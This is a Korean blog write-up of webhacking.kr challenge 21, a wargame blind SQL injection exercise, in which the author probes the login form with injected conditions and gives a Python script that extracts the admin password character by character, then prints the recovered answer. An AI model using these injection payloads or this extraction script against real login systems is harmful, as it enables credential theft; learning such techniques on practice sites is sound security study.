vared
vared - Blog
vared
전체 방문자
오늘
어제
  • 분류 전체보기 (138)
    • Study (0)
    • Project (0)
    • Paper Review (0)
    • Tool (0)
    • WriteUp (124)
      • Root-me.org (44)
      • LOS_rubiya (32)
      • Webhacking.kr (21)
      • DreamHack (9)
      • XCZ.kr (8)
      • HackCTF (10)
    • Miscellaneous (0)
    • Forensic-CheatSheet (10)

블로그 메뉴

  • Category

공지사항

  • Forensic-CheatSheet 오픈

인기 글

태그

  • File Execution
  • JavaScript
  • Digital Forensic
  • Windows Artifact
  • LNK FIile
  • forensic artifacts
  • sql injection
  • shellbag forensics
  • shellbag
  • digital-forensics
  • forensic-cheatsheet
  • Artifacts
  • Digital-Forensic
  • iconcahce
  • Thumbcache
  • ssd
  • Los
  • webhacking.kr
  • trim

최근 댓글

최근 글

티스토리

hELLO · Designed By 정상우.
vared

vared - Blog

WriteUp/Webhacking.kr

webhacking.kr : challenge 21

2020. 9. 11. 22:53

제목에 대놓고 Blind SQL Injection 이라고 써있다.

 

별도의 소스는 없어서 필터링 항목이 뭔지는 모르겠다.

 

국룰로

id : guest

pw : guest

를 넣어본 결과 login success 가 떴다.

 

guest의 비밀번호를 찾아보는 식으로 해보자.

union에 필터링 걸려있는거같다.

 

id=%27admin%27%20and%20length(pw)>0%23&pw=1

참인 문장을 주었을 때 wrong password 라고 나온다.

거짓인 문장을 주면 login fail이라고 나온다.

참거짓을 판단할 수 있으니 다했다.

 

python 코드 짜서 보자

 

found the length : 36

길이가 36이다.

이제 문자열을 찾아주면 되겠지

import requests

url="https://webhacking.kr/challenge/bonus-1/index.php"
PHPSESSID="rcbf21uirte023jsravgq3vav5"
"""
#length finding
length=1
while(1):
    print("sending "+str(length))
    pay="?id='or id='admin' and length(pw)="+str(length)+"%23&pw=1"
    res=requests.post(url=url+pay,cookies=(dict(PHPSESSID=PHPSESSID)))
    if "wrong password" in res.text:
        print("found the length : "+str(length))
        break
    length+=1
"""
pw=""
for i in range (1,37):
    print("doing :"+str(i))
    for j in range(48,128):
        pay="?id='or id='admin' and ascii(substr(pw,"+str(i)+",1))="+str(j)+"%23&pw=1"
        res=requests.post(url=url+pay,cookies=(dict(PHPSESSID=PHPSESSID)))
        if "wrong password" in res.text:
            print("found the word! "+chr(j) )
            pw+=chr(j)
            break


print("pw is  :"+pw)

there_is_no_rest_for_the_white_angel

저작자표시

'WriteUp > Webhacking.kr' 카테고리의 다른 글

webhacking.kr : challenge 23  (0) 2020.09.11
webhacking.kr : challenge 22  (0) 2020.09.11
webhacking.kr : challenge 20  (0) 2020.09.11
webhacking.kr : challenge  (0) 2020.09.11
webhacking.kr : challenge 14  (0) 2020.09.11
    'WriteUp/Webhacking.kr' 카테고리의 다른 글
    • webhacking.kr : challenge 23
    • webhacking.kr : challenge 22
    • webhacking.kr : challenge 20
    • webhacking.kr : challenge
    vared
    vared

    티스토리툴바